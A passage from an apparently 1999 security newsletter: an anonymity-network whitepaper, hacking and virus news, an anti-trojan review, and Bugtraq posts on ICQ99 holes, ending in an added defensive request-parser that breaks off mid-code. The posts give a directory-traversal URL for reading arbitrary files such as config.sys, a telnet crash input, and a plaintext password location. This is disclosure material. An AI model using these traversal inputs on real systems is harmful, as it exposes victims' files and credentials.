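        budget = min(env, throttle)       # the only thing a passive observer sees
        real = min(pending, budget)       # fill the budget with real data first...
        pending -= real                   # ...whatever is left of it is padding
        wire.append(budget)
        delivered.append(real)
    return wire, delivered, pending


def reactive_shape(payload, floor, throttle):
    """Leaky shaper: the envelope tracks demand, so the wire trace is the data."""
    pending, wire = 0, []
    for offered in payload:
        pending += offered
        budget = min(max(pending, floor), throttle)
        pending -= min(pending, budget)
        wire.append(budget)
    return wire


def observer_can_distinguish(wire_a, wire_b):
    """A passive observer compares two traces; any difference is a leak."""
    return wire_a != wire_b


BUSY = [500, 800, 0, 0, 300]      # constructed: a burst of real traffic
IDLE = [0, 0, 0, 0, 0]            # constructed: nothing to send
ENVELOPE = [400] * 5              # constructed: flat 400 bytes/tick envelope
THROTTLE = 1000                   # constructed: operator's bandwidth cap


if __name__ == "__main__":
    good = shape(BUSY, ENVELOPE, THROTTLE)[0], shape(IDLE, ENVELOPE, THROTTLE)[0]
    bad = reactive_shape(BUSY, 100, THROTTLE), reactive_shape(IDLE, 100, THROTTLE)
    print("independent envelope leaks:", observer_can_distinguish(*good))
    print("reactive envelope leaks:   ", observer_can_distinguish(*bad))
```

        The cost of the data-independent shaper shows up as backlog and queuing delay (see the delivered list for BUSY), never on the wire. A production envelope would be tuned
        from long-term aggregates as the paper says; the only property that matters for the leak is that the schedule for a tick is fixed before that tick's data arrives.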
       
         
       
       Freedom Client Software
       
       The Freedom Client application runs on the user's computer and acts as a Local Anonymous Internet Proxy (LAIP). The Freedom client provides support and acts as proxy for various
       Internet protocols, including
       
            DNS 
            HTTP 
            HTTPS 
            SMTP 
            POP3 
            Telnet 
            SSH 
            IRC (DCC not supported) 
            USENET (via a web interface) 
       
       The client is, conceptually, an input funnel that anonymizes all Internet traffic before it leaves the client system to the Freedom network. Freedom avoids the trouble of managing the mail
       or browsing clients, since it operates at the Winsock, session, and network levels. Freedom monitors outgoing streams and warns the user if it detects the presence of any personal
       information. The user then chooses to remove the information or release the message as is.
       
       The Freedom client also acts as a personal data manager. The release of personal data is contextual, based on the source and the active digital identity. A typical example of controlled
        information release is when a user wishes to access a mandatory-registration site, but does not want to reveal personal information. Using Freedom, the user creates a digital identity to
       access the site; a cookie is then created using this user's pseudonymous profile. Whenever the user returns to that site, the same information is read from the cookie, granting the user
       access without accidentally revealing sensitive information. The user decides what personal information is divulged and whether it is false or accurate, while the Freedom client's task is
       to ensure that this process remains consistent.
       
         
       
       Freedom Mail Gateway
       
       The Freedom Client sends all outgoing email to the Freedom Mail Gateway using AMTP. The Freedom Mail Gateway keeps a reordering pool in which emails are kept for a random period
       of time before being put into the outgoing message queue. Conversely, incoming email is stored in the reordering pool before being delivered through the AMP chains specified by the
       user's reply blocks.
       
         
       
       Freedom Network Information Database
       
        The Freedom Network Information Database (NIDB) stores the topological maps of the Freedom network, link performance statistics, and node status information.
       
         
       
       Freedom Keyserver
       
       The Freedom Keyserver offers a publicly accessible database containing the public keys of each Freedom Node and of all Freedom identities. Zero Knowledge Systems does not store
       and at no time has access to the corresponding private keys of the independent Freedom Server operators or Freedom users. The private keys are generated on and never leave the
       individual Freedom Server or the Freedom client software.
       
       Comparison with other proposed Internet Privacy Systems
       
         
       
       Mixmaster
       
       Mixmaster is an existing freeware email-only remailer.
       
         Freedom                                          Mixmaster
         -------                                          ---------
         Perfect forward secrecy.                         Future compromise of the remailer key allows
                                                          an attacker to decrypt all past traffic.
         Does not know the previous mail hop; the         Does know the previous mail hop. A legal attacker
         remailer chain cannot be backtracked.            may be able to travel up the chain, leading to
                                                          discovery of the email's sender.
         Both link- and application-level anonymizing.    Application-level anonymizing only.
       
       
       Onion Routers
       
       Onion Routers are an application proxy based TCP anonymizer proposed by the US Naval Research Laboratory.
       
         Freedom                                          Onion Routers
         -------                                          -------------
         Anonymous network payload is at the IP level.    Based on application-level proxies. Each additional
         Any protocol on top of IP can be supported.      application requires an additional proxy.
         Utilizes end-to-end TCP congestion control.      TCP link-level encryption causes unnecessary
                                                          packet retransmission.
         Traffic is encrypted before leaving the client.  Traffic is in the clear before reaching the first node.
       
         
       
       Bibliography
       
       Ross Anderson, "The Eternity Service", PRAGOCRYPT 96. 
       ftp://ftp.cl.cam.ac.uk/users/rja14/eternity.ps.Z
       
       Andre Bacard, "Anonymous Remailer FAQ", 1996. 
       http://www.well.com/user/abacard/remail.html
       
       Douglas Barnes, "The Coming Jurisdictional Swamp of Global Internetworking 
       (Or, How I Learned to Stop Worrying and Love Anonymity)", 
       unpublished manuscript, 16 Nov 1994. 
       http://www.communities.com/paper/swamp.html
       
       David Chaum, "Untraceable Electronic Mail, Return addresses, and 
       Digital Pseudonyms", Communications of the ACM, February 1981, vol. 24 no. 2. 
       http://www.eskimo.com/~weidai/mix-net.txt
       
        Lance Cottrell, "Mixmaster & Remailer Attacks", 1995. 
       http://www.obscura.com/~loki/remailer/remailer-essay.html
       
       Ray Cromwell, "Welcome to the Decense Project", 1996. 
       http://www.clark.net/pub/rjc/decense.html
       
       Wei Dai, "PipeNet 1.1", 1998. 
       http://www.eskimo.com/~weidai/pipenet.txt
       
       Arnoud Engelfriet, "Anonymity and Privacy on the Internet", 19 Dec 1996. 
       http://www.stack.nl/~galactus/remailers/index.html
       
       Ian Goldberg, David Wagner, and Eric A. Brewer, 
       "Privacy-enhancing technologies for the Internet", 
       IEEE COMPCON '97, February 1997. 
       http://www.cs.berkeley.edu/~daw/privacy-compcon97-www/privacy-html.html
       
       Ian Goldberg and David Wagner, 
       "TAZ Servers and the Rewebber Network: Enabling Anonymous Publishing on the 
       World Wide Web", 
       Published in the First Monday electronic journal, vol 3 no 4. 
       http://www.firstmonday.dk/issues/issue3_4/goldberg/index.html
       
       C. Gulcu and G. Tsudik, "Mixing E-mail with Babel", 
       Proc. Symp. Network and Distributed System Security, 1996, pp. 2-16. 
       
       Andreas Pfitzmann and Michael Waidner, 
       "Networks without user observability--design options", 
       EUROCRYPT 85, LNCS 219, Springer-Verlag, pp. 245-253. 
       
       Paul Syverson, David Goldschlag, Michael Reed, "Onion Routing," 
       http://www.onion-router.net/Publications.html
       
         
       
       Glossary
       
            ACI: Anonymous Connection ID
       
            AIP: Anonymous Internet Proxy
       
            AMP: Anonymous Mail Proxy
       
            AMTP: Anonymous Mail Transfer Protocol
       
            ATCP: Anonymous TCP
       
            LAIP: Local Anonymous Internet Proxy 
       
            NIDB: Network Information Database 
       
         
       
       Trademark Notices
       
            Freedom and the Freedom logo are trademarks of Zero-Knowledge Systems Inc. 
       
            All other products and company names mentioned herein are the trademarks of their respective owners. 
       
             (c) 1998 Zero Knowledge Systems http://www.zeroknowledge.com
       
             
      @HWA
 
 08.0  Mitnick's accomplice pleads guilty
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Mitnick's hacker accomplice pleads guilty 
       By Dan Goodin
       Staff Writer, CNET News.com 
       April 26, 1999, 2:05 p.m. PT 
       URL: http://www.news.com/News/Item/0,4,35656,00.html 
       
       Lewis DePayne, the accomplice to notorious hacker Kevin Mitnick, today pleaded guilty to one count of wire
       fraud for his role in a series of computer break-ins that took place over a three-year period, the U.S. 
       Attorney's office in Los Angeles said. 
       
       DePayne, 29, admitted that he took part in a plan to obtain sensitive software from cellular telephone maker
       Nokia by posing as a company employee. The count was 1 of 14 brought against him in a 1996 criminal complaint.
       DePayne entered his plea in federal court in Los Angeles before Judge Mariana Pfaelzer. Last month
       Mitnick pleaded guilty to 5 of 25 counts in the same court. 
       
       DePayne's attorney was not immediately available for comment. 
       
       DePayne is scheduled to be sentenced July 12. Under a plea agreement, U.S. attorneys will recommend that DePayne 
        receive six months' detention, five years of probation, and up to $3,000 in fines, said assistant U.S. attorney 
       Chris Painter. He also will have to tell investigators and the companies he is accused of defrauding exactly how 
       he and Mitnick were able to penetrate security systems. DePayne, who lives in Northern California, has been free 
       on bail, Painter said. 
       
       DePayne and Mitnick are known for their ability to hack computer systems and to "social engineer" employees 
        responsible for security at high-tech companies. When Mitnick was trying to use cell phones to break in to computer
       systems, he called Nokia posing as an employee and asked that software be sent to him. When that didn't work, 
       DePayne posed as the fictitious employee's supervisor. Suspecting the requests were a hoax, Nokia recorded the 
       call and provided investigators with tapes. 
       
       Mitnick's exploits made national headlines after his capture was reported in The New York Times and later in 
       the book Takedown. Mitnick, 39, is accused of breaking in to numerous computer networks, accessing thousands of
       credit card numbers, and stealing software between 1992 and 1995. 
       
       U.S. attorneys fighting high-tech crime appear to be on a roll. Two weeks ago, investigators tracked down the man
       they say posted a bogus Bloomberg story that caused a publicly traded company's stock to surge more than 30 points.
       Last week they identified the suspect in a case in which anonymous email that threatened the lives of court 
       officials was posted on the Internet. 
       
       "Our offices and other offices around the country will be investigating when people cause damage to companies, 
       infrastructure, and proprietary data," said Painter. "These companies ought to have protection."   
       
       @HWA
       
 09.0  Biometric Databases?
       ~~~~~~~~~~~~~~~~~~~~
       
       http://www.wired.com/news/news/politics/story/19338.html
       http://www.wired.com/news/print_version/politics/story/19338.html?wnpg=all
       
       DNA Databases Go Too Far
       by Declan McCullagh 
       
       2:15 p.m.  26.Apr.99.PDT
       WASHINGTON -- If Representative Ron Paul has his way, federal agencies will not be able to assemble biometric 
       profiles of Americans. 
       
       The Texas Republican wants to prohibit massive government databases of DNA samples, photographs, and retinal
       scans. 
       
       "It seems like everywhere you turn there's another government attempt to accumulate more information about us.
       This bill will be designed to stop those moves that use government money to set up data banks with DNA and 
       other identifiers, such as pictures of the retina," Paul said in an interview. 
       
       Aides to Paul, who has emerged as a prominent privacy advocate in Congress, drew up the sweeping new bill after
       a public outcry arose over federal tax dollars being used to build a national database of driver-license photographs. 
       
        The US Secret Service paid Image Data LLC US$1.5 million to develop the database, which has become the target of at least
        two lawsuits since the agency's role became public. 
       
       "The fact that this was started with a grant from the Secret Service shows they're moving in that direction," Paul
       said. "This whole process smells bad to me, and I thought I'd call attention to it among my colleagues by introducing
       this bill." 
       
       An early draft of the proposed Privacy Protection Act would prevent the use of Secret Service funds -- or any tax 
       dollars, for that matter -- to  create any database containing biometric information about Americans. 
       
       The federal government has recently begun to record more biometric information about Americans. Biometric technology 
        allows the automatic recognition of a person based on physical characteristics. The Army issues recruits at Fort Sill,
       Oklahoma stored value cards that require the correct fingerprint to use. The Immigration and Naturalization Service uses
       voice-identification technologies at some airports. 
       
       The FBI is busy scanning paper fingerprint cards to create digital images and is feeding them into the National Crime
       Information Center computer, which the government says receives more than 2 million queries a day. The NCIC database
       is already overflowing with information about 32 million Americans, and Attorney General Janet Reno wants to add DNA
       samples taken from anyone arrested. A preliminary version of the bill, which Paul hopes to introduce by the end of 
       the week, would approve databases created by the Social Security Administration, the IRS, the Census Bureau, and the
        Department of Veterans Affairs. And the prohibition would not apply to the "collection and use of names and Social Security
       numbers by the Social Security Administration and the Internal Revenue Service for functions directly related to the
       collection of revenue and the administration of the Social Security program." 
       
       Paul's staff said that the final version of the proposal would limit the expansion of existing databases. 
       
       "The creation of national databases has gone out of control over the last 10 years," said David Banisar, a lawyer at 
       the Electronic Privacy Information Center. They're "frequently at the instigation of Congress, which has created them
       in the name of fighting immigration or welfare fraud or any number of issues. This often happens in secret, with no 
       public accountability or privacy protections." 
       
       Banisar added, "It's a very positive step that Congress is starting to recognize, after all this time, the dangers of
       these databases." 
       
       But some experts say that the draft may go too far. "It could be too broad. I do think the federal government has a
       legitimate role in dealing with interstate cooperation in terms of crime. It seems reasonable to me that the federal
       government could fund an interstate crime database project...What about a hospital using federal grant funds to come
       up with a database containing medical records about its patients?" asks Eugene Volokh, a law professor at the 
       University of California at Los Angeles. 
       
       Paul also has introduced legislation that would protect financial privacy by getting rid of the so-called Know Your 
       Customer plan proposed -- and since abandoned -- by banking regulators. 
       
       @HWA
      
 10.0  In the wake of CIH...
       ~~~~~~~~~~~~~~~~~~~~~
       From HNN http://www.hackernews.com/
       
       CIH, Killer or Dud? 


       contributed by Anonymous 
       The media frenzy continues although at this point it is hard to tell if CIH was a major infestation or mostly
       media Hype. Some reports are claiming ridiculous amounts of damage while others say there was almost
       no damage. 
 
       Singapore checks in with 150 reported incidents.
       Channel New Asia 
       http://www.channelnewsasia.com/articles/1999/4/26/news1040.htm
       ZDNet 
       http://www.zdnet.com/zdnn/filters/bursts/0,3422,2247380,00.html
 
       South Korea had an estimated 15% or 1 million systems
       hit costing the country up to 300 billion won (US$253.86
       million) in related repair costs.
        Andover News 
       http://www.andovernews.com/cgi-bin/news_story.pl?155551/topstories
 
       CIH hits 12 of 60 brokerage houses in Malaysia. The infections did not hinder the performance of Malaysia's
       benchmark stock index.
       
       International Herald Tribune 
       http://www.iht.com/IHT/TODAY/TUE/FIN/wirus.2.html
 
        Many government offices wiped out in Turkey. Private banks, police departments, an army school, state TRT
        television, the Title Deeds and Land Survey office and the state-owned Kalkinma Bank were some of the places
        hit.
       
       CNN 
       http://customnews.cnn.com/cnews/pna.show_story?p_art_id=3663070&p_section_name=On+Target&p_art_type=1460518
 
       Most damage relegated to Asia and Europe. Data Fellows reports damage in Hong Kong, Singapore, India,
       Finland, New Zealand, Britain, Sweden, Japan, and Malta.
       
       C|Net 
       http://www.news.com/News/Item/0,4,0-35632,00.html?st.ne.fd.mdh.ni
 
        CIH hits Boston College hard, students lose a semester's worth of work. MSNBC says that while there were
        pockets of infections most people were unaffected.
       
       MSNBC 
       http://www.msnbc.com/news/262104.asp
 
        Australia says 'No Meltdown' 
       Australian Broadcasting Corporation 
       http://www.abc.net.au/news/newslink/weekly/newsnat-27apr1999-42.htm
 
        While nowhere near as widespread as Melissa, CIH was much more deadly.
       
       Nando Times http://www.techserver.com/story/body/0,1634,42451-68484-495994-0,00.html
       PC World http://www.pcworld.com/pcwtoday/article/0,1510,10717,00.html
       Wired http://www.wired.com/news/news/technology/story/19334.html
 
       CIH turned out to be no big deal with minimal damage.
       Detroit Free Press http://www.freep.com/tech/qvirus27.htm
       The Akron Beacon Journal http://www.ohio.com/bj/business/docs/026278.htm
       
       
10.1  CIH 1.2 Virus Hits Few 
      ~~~~~~~~~~~~~~~~~~~~~~
      
      Only a small number of PCs get blasted by the
      "Chernobyl" virus.

      by Reuters 
      April 27, 1999, 4:32 a.m. PT 

      The CIH 1.2 ("Chernobyl") virus hit computers around
      the world on Monday, wiping out data on hard drives
      and even causing some PCs to fail when starting up,
      computer experts said. 

      Although the virus hit only a tiny fraction of the number
      of machines affected by the recent Melissa virus, the
      new bug's bite was much more deadly for an
      unfortunate few.

      "I've talked to people who, literally, were crying on the
      telephone--a woman whose poetry book was almost
      done and was completely lost, a man whose doctoral
      dissertation was lost. They were devastated," said
      Mikko Hermanni Hypponen, of computer security firm
      Data Fellows in Helsinki.

      The worst damage appeared to be taking place in Asia
      and parts of Europe, where antivirus protection is less
      prevalent, and with pirated software, which is often filled
      with bugs.

      Data Fellows reported damage in Hong Kong,
      Singapore, India, Finland, New Zealand, Britain,
      Sweden, Japan and Malta, with hundreds of machines
      already being hit even before the United States opened
      for business. The bulk of the computers affected were
      in Asia, Data Fellows said.

      A Handful Hit

      Carnegie Mellon University's Computer Emergency Response Team said it knew of only a few dozen
      computers hit by the virus. "It really hasn't been that bad," said a CERT case worker.

      But the Chernobyl virus's limited impact did little to console those who were infected. DataFellows'
      Hypponen said that the cost of repairs could run into the millions of dollars. "Unlike Melissa, this is causing
      real problems and serious loss of data for some people," he said.

      CERT said that data "may be unrecoverable" if the virus hits, and software needs to be reinstalled from the
      ground up to make computers work again, a task beyond the expertise of most home computer users.

       "I just turned on the doggone thing and the screen was almost totally black--it said 'os load in progress' and
       then it said 'insert bootable media in appropriate drive,'" said one person hit by the virus, Christina Asksomitas
       of Palm Beach County, Florida. "We tried to reboot it but nothing works."

      The virus struck the campus of Boston College in Chestnut Hill, Massachusetts, shortly after midnight on
      Monday, wiping out the hard drives of about 100 students, many of whom were preparing term papers,
      school spokesperson Jack Dunn said.

      Virus Hits Monthly

      Computer experts said users could avoid the virus by not booting up their computers Monday, or resetting
      the date, since the virus is activated when computer utility systems hit the twenty-sixth of each month.

      While the virus has been hitting on the twenty-sixth day of each month since last year, this month's version was
      expected to be the most prevalent and dangerous. The April CIH virus is called the Chernobyl virus because it's
      timed to go off on the anniversary of the Soviet nuclear accident, one of technology's worst disasters.

      Up-to-date antivirus software will spot the virus, and many corporate computers have recently upgraded
      their protection because of the Melissa scare. 

       Copyright (c) 1999 Reuters Limited 
       
       
       
       @HWA  
       
 11.0  Lockdown2000 review by BHZ
       ~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From HNS http://www.net-security.org/
       
        INTRO
        We live on the edge of this millennium. Computers are becoming to people
        what TV sets were a few decades ago. The main things that we want on
        the Internet are privacy and security. Security is always tested
        by some new bugs, flaws and vulnerabilities. So we must always be
        secured. Most Windows95 users are targeted by some trojans.
       
       DEFINITION OF TROJAN
        Trojans could be defined in these ways:
       An unauthorized program contained within a legitimate program. This 
       unauthorized program performs functions unknown (and probably unwanted)
       by the user.
       A legitimate program that has been altered by the placement of 
       unauthorized code within it; this code performs functions unknown (and 
       probably unwanted) by the user.
       Any program that appears to perform a desirable and necessary function 
       but that (because of unauthorized code within it that is unknown to 
       the user) performs functions unknown (and probably unwanted) by the 
       user. 
       
       LOCKDOWN2000
        There are many solutions for securing yourself from trojans, from
        monitoring your registry to some commercial and non-commercial programs.
        I think that the best program I have used for trojan detection is 
        Lockdown2000. 
        The main thing in good anti-trojan cleaners is that they are
        upgradeable. The staff behind Lockdown2000 is always on alert, so
        you can download the newest trojan definitions from their website.
        Lockdown2000 sits in your system tray and scans your computer 
        at the time interval that you enter. It has two modes - Scan for unknown
        trojans and Background scan for trojans. OK, so this is a lifesaver
        option. It monitors your registry and some system files for new 
        entries. When some change is made, you are automatically alerted,
        and you can then decide whether this string or file will be deleted 
        or not. It helped me when I was downloading and checking some files
        from a trusted host, and at one moment something beeped and the
        Lockdown2000 window opened. It detected a file which tried to add 
        its string to the start directories in the registry. I chose not
        to keep this file, and it was immediately deleted. I
        later looked more into that file, and it was a modified version of
        Back Orifice. I deactivated Lockdown2000 and installed that trojan 
        (LM BO.LEENTech), and scanned my computer with some other trojan 
        cleaners, and it wasn't found. So a trojan cleaner and registry monitor
        in one program is a winning combination.  The current trojan signature 
        file has 88 trojan definitions in it. So my opinion is that this is a
        very impressive number.
       
       Lockdown2000 has even more quality functions:
       
        Port sniffer
        It listens on some ports on your computer, which trojan client programs
        are used to connect to.
        TraceRoute
        OK, so someone pinged you (sent you tcp packets and waits for a reply if the
        port is open) on some trojan-used port. Lockdown2000 gives you
        his IP address. Now with TraceRoute you can trace the "attacker" 
        to his Internet Service Provider, and you can report him to the admins.
        WhoIs 
        Very useful because you don't have to connect to Internic (or some other 
        domain seller - yes, Internic lost its monopoly on it), because you can
        do it from a program which is always close to you - in your system tray. 
        File Sharing
        File and Print sharing was a very popular intrusion method some months 
        ago when it was reported by Rhino9, and the Legion software (which scans for
        "open" computers) was produced. If you have some disk partitions
        which must be opened to just a group of people, you just use
        Lockdown2000 and put a password on the share.
       
        LOCKDOWN2000 INFO
        Program name : Lockdown2000 v.2.5.4
        Website      : http://www.lockdown2000.com
        Tech support : support@lockdown2000.com
       
       BHZ
       bhz@net-security.org
       http://net-security.org
       
       @HWA      
       
 12.0  ICQ99 Vulnerabilities and Exploits
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       Date: Sun, 25 Apr 1999 22:46:02 +0400
       From: delta <x-delta@USA.NET>
       To: BUGTRAQ@netspace.org
       Subject: ICQ 99 Password
       
       
        Hi! I found that ICQ 99 stores the password in plain text in the file
        ICQ\NewDB\uin#.dat
        Try opening it with Notepad, hit search and enter your password.
        The password is always placed at the end of the line "iUserSound".
       
       Thanx!
       
       ----------------------------------------------------------------------------
       
       Date: Mon, 5 Apr 1999 23:50:56 +0200
       From: Jan Vogelgesang <wj.Vogelgesang@SAARBRUECKEN.NETSURF.DE>
       To: BUGTRAQ@netspace.org
       Subject: security hole in ICQ-Webserver
       
       Hi,
        Some days ago I read a message here on Bugtraq from Ronald A. Jarrell
        about a vulnerability in the ICQ-Webserver. I tried to reproduce this
        vulnerability on my computer (win95) and found out the following:
        - sending any non-HTTP stuff or even a simple "get" (without any other
        characters, however) crashes the ICQ client. This works with ICQ99a V2.13
        Build 1700, but not with Build 1547.
        
        Moreover, there is a much bigger hole in the ICQ-Webserver: if you have
        the webserver enabled, everyone can access your complete(!) hard disk
        with a simple web browser.  When your page is activated and you are online,
        each request to "http://members.icq.com/<your ICQ-Number>" will be
        redirected to your computer. Thus, every visitor gets to know your current IP.
        Nevertheless, only the files in "/ICQ99/Hompage/<your ICQ-Number>/personal"
        should be accessible. But a visitor can "climb up" the directory tree with
        some dots, e.g. "http://<yourIP>/...../a2.html" would present him the file
        "a2.html" in the "ICQ99" directory. With some more dots, he would come to
        the root directory of your hard disk.  But there is one barrier: the
        ICQ-Webserver only delivers files with a ".html" extension. After some
        experiments I found a way to trick it: I add ".html/" to the URL and
        the webserver sends every file I request. For instance,
        "http://<yourIP>/............./config.sys" won't work, but
        "http://<yourIP>/.html/............./config.sys" would.
        I have tested this both with Build 1700 and with Build 1547.
        
        In my opinion, this is a significant security problem, because password
        files or even the registry in the Windows directory can be read.
        I warned Mirabilis about it and hope they will inform the ICQ community.
        Sorry for my poor English...
       
       Jan Vogelgesang
       
       -------------------------------------------------------------------------------
       
       Date: Thu, 8 Apr 1999 08:45:48 -0400
        From: "José Reyes Cedeño" <jreyes@CEIS.ISPJAE.EDU.CU>
       To: BUGTRAQ@netspace.org
       Subject: Re: ICQ Webserver bug
       
       >Well, my box was win 98, and the remote box I tested it against was
       >win 95.  Didn't have anyone running NT handy to test against.  However,
       >another person I corresponded with who was testing this did get it to
       >drop a 95 box, but not every time.  Did it every time for me; but there's
       >apparently other factors that contribute as well.
       >
       >--
       >Ron Jarrell
       >VA Tech Computing Center
       
        I tried to test this on my NT box (NT Server 4.00.1381, Service Pack 3) and I
        could not reproduce the error. I used ICQ Version 99a Beta v.2.13 Build
        1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang explained
        in detail the procedure they carried out to arrive at the error.
       
       Best regards, Jose.
       
       -------------------------------------------------------------------------------
       
       Date: Thu, 8 Apr 1999 19:35:35 +0000
       From: sven@MSC-MEDIA.COM
       To: BUGTRAQ@netspace.org
       Subject: Re: security hole (READ AS: security chasm) in ICQ-Webserver
       
       On  8 Apr, DaChronic wrote:
       >  I can confirm this with Win9x but not with WinNT 4.0 sp3 and hotfixes
       > nor sp4 (can anyone else?). ..........
       
        As was discussed some time ago on this list,
        the 'more than 2 dot' feature does not work with NT.
        But it definitely works with 95/98.
        
        Maybe replacing /.../ with /../../ will work?
       
       CU Sven
       
       -------------------------------------------------------------------------------
       
       Date: Thu, 8 Apr 1999 18:08:06 -0700
       From: Scott <smc@visuallink.com>
       To: BUGTRAQ@netspace.org
       Subject: Re: ICQ Webserver bug
       
       I'm using Win98/4.10.1998 w/ ICQ Version 99a Beta v.2.13 Build #1700
       
        I could crash my ICQ webserver and read files remotely.  When I have tried
        this on other computers, it only works some of the time; sometimes it
        returns "Forbidden" when I try to crash it or d/l files.
       
       -------------------------------------------------------------------------------
       
       Date: Thu, 8 Apr 1999 19:30:18 -0400
       From: Kaven Rousseau <rousseau@GLOBETROTTER.QC.CA>
       To: BUGTRAQ@netspace.org
       Subject: Re: ICQ Webserver bug
       
       At 08:45 1999-04-08 -0400, you wrote:
       >>Well, my box was win 98, and the remote box I tested it against was
       >>win 95.  Didn't have anyone running NT handy to test against.  However,
       >>another person I corresponded with who was testing this did get it to
       >>drop a 95 box, but not every time.  Did it every time for me; but there's
       >>apparently other factors that contribute as well.
       >>
       >>--
       >>Ron Jarrell
       >>VA Tech Computing Center
       >
       >I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I
       >could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build
       >1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained
       >the procedure that they carried out to arrive to the error detailedly.
       >
       >Best regards, Jose.
       
       
        I tested it against my own Win98 box with IE5 final (English); result: I was
        vulnerable.
        My friend with Win98 and IE4 (French); result: vulnerable.
        Another friend with Win98 and IE5 (French); result: vulnerable.
        
        We were all using ICQ99a build 1700.
        
        Method used:
        telnet to port 80
        send: QUIT <LF>
        It disconnects after 5 to 10 seconds.
       
       ,
       |
       | Kaven Rousseau
       | rousseau@globetrotter.qc.ca
       | FingerPrint:  F1C8 F915 9F0F DD5E DACB  024B 5C6F 163D F097 40D6
       `------------------- ---- -- -
       
       -------------------------------------------------------------------------------
       
       Date: Sat, 10 Apr 1999 20:45:56 +0200
       From: Frank Dekervel <kervel@SVENNIEBOY.TERBANK.KOTNET.ORG>
       To: BUGTRAQ@netspace.org
       Subject: Re: ICQ Webserver bug
       
        Hmm,
        
        I'd like to add one last thing to this, according to me, much too long
        thread. (It seems some writers aren't thinking about the cause.)
        
        If you have a look at the pseudocode below, which I suspect Mirabilis
        uses, you'll find thousands of ways to exploit ICQ.
       
       fread(my_socket,"%s %s %s", getword, url, httpversion);
        /// if you only feed two or one word, it 'dumps core', gpf under windoze
       change the slashes in url to backslashes;
       url = "c:\program files\icq\webroot_dir\" + url;
        /// yes, this is the '../../../../' bug ...
       open(fd,url);
       read(fd,buffer);
       write(socket,buffer);
       close(socket);
       
       
       
        I think it's this because I made a small webserver earlier to see common
        bugs. I checked on the net, and the dynamic server of Francois Piette
        (known for Delphi components) and various shareware servers, or remote
        admin modules for e.g. proxy servers, are vulnerable.
       
       
       greetz,
       
       kervel
       (kervel@svennieboy.terbank.kotnet.org)
       

       ----------------------------------------------------------------------------
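
        Kervel's pseudocode shows where both defects in this thread come from: a
        three-word read whose result is never checked (so "QUIT" or a bare "get"
        leaves garbage in the URL buffer), and a URL glued onto the web root with
        no look at its dot segments or at where the ".html" actually sits. As an
        added example (not Mirabilis code and not from any post in this thread;
        every name in it is invented), this is how that handler should parse and
        check a request line, run over request lines modelled on the ones reported
        above:

```c
/* Added example, not Mirabilis code and not from this thread: a request-line
 * parser and path check written the way the pseudocode above should have been.
 * It refuses a request line with fewer than three words ("QUIT", "get") and a
 * URL whose dot segments or ".html/" prefix would escape the web root.
 * Every name here is made up for the example. */
#include <stdio.h>
#include <string.h>

enum verdict { V_OK = 200, V_BAD_REQUEST = 400, V_FORBIDDEN = 403 };
enum { MAX_SEGS = 64 };

/* Parse "METHOD SP URL SP VERSION". The "%s %s %s" read in the pseudocode
 * leaves url and version as garbage when fewer than three words arrive; here
 * the field count is checked and the widths bound each buffer. */
static int parse_request_line(const char *line, char *method, char *url, char *version)
{
    return sscanf(line, "%15s %511s %15s", method, url, version) == 3;
}

/* Resolve the URL path to a relative path under the web root, or refuse it.
 * Segments sit on a stack so ".." pops one level and never above the root.
 * A segment made only of dots that is neither "." nor ".." is refused: on
 * Win9x "..." climbs two levels and "...." three (the "more than 2 dots"
 * behaviour discussed above). Backslashes, drive colons and control bytes are
 * refused because the server turns slashes into backslashes and hands the
 * result straight to the file system. Percent-decoding, if the server does
 * any, must already have happened before this check. */
static int resolve_under_root(const char *url, char *out, size_t outcap)
{
    const char *seg[MAX_SEGS];
    size_t len[MAX_SEGS], used = 0;
    int depth = 0;
    const char *p = url;

    if (*p != '/') return V_FORBIDDEN;            /* absolute-path form only */
    while (*p) {
        while (*p == '/') p++;                    /* collapse repeated slashes */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t n = (size_t)(p - start);
        for (size_t i = 0; i < n; i++) {
            unsigned char c = (unsigned char)start[i];
            if (c == '\\' || c == ':' || c < 0x20 || c == 0x7f) return V_FORBIDDEN;
        }
        if (strspn(start, ".") == n) {            /* segment is nothing but dots */
            if (n == 1) continue;                 /* "."  : stay here */
            if (n != 2 || depth == 0) return V_FORBIDDEN; /* "..." etc., or ".." at root */
            depth--;                              /* ".." : one level up */
            continue;
        }
        if (depth == MAX_SEGS) return V_FORBIDDEN;
        seg[depth] = start;
        len[depth++] = n;
    }
    if (depth == 0) return V_FORBIDDEN;           /* "/" alone names no file */
    for (int i = 0; i < depth; i++) {             /* rebuild with forward slashes */
        if (used + len[i] + 2 > outcap) return V_FORBIDDEN;
        if (i) out[used++] = '/';
        memcpy(out + used, seg[i], len[i]);
        used += len[i];
    }
    out[used] = '\0';
    return V_OK;
}

/* The server in the thread accepted any URL containing ".html", which is why
 * "/.html/......../config.sys" passed. Test the final segment only. */
static int has_html_extension(const char *relpath)
{
    const char *base = strrchr(relpath, '/');
    base = base ? base + 1 : relpath;
    size_t n = strlen(base);
    return n > 5 && strcmp(base + n - 5, ".html") == 0;
}

/* Decide one request line. On V_OK relpath holds the path to open relative
 * to the web root; on any other verdict it is left empty. */
int check_request(const char *line, char *relpath, size_t cap)
{
    char method[16], url[512], version[16];
    relpath[0] = '\0';
    if (!parse_request_line(line, method, url, version)) return V_BAD_REQUEST;
    if (strcmp(method, "GET") != 0) return V_BAD_REQUEST;
    int v = resolve_under_root(url, relpath, cap);
    if (v == V_OK && !has_html_extension(relpath)) v = V_FORBIDDEN;
    if (v != V_OK) relpath[0] = '\0';
    return v;
}

/* Wrapper with a static result buffer, handy for tests and the demo below. */
static char last_path[512];
int verdict_for(const char *line) { return check_request(line, last_path, sizeof last_path); }

int main(void)
{   /* Constructed request lines modelled on the reports in this thread. */
    const char *samples[] = { "QUIT", "get", "GET /.html/............./config.sys HTTP/1.0",
        "GET /......../windows/win.ini HTTP/1.0", "GET /../a2.html HTTP/1.0",
        "GET /personal/notes.txt HTTP/1.0", "GET /personal/../personal/index.html HTTP/1.0" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
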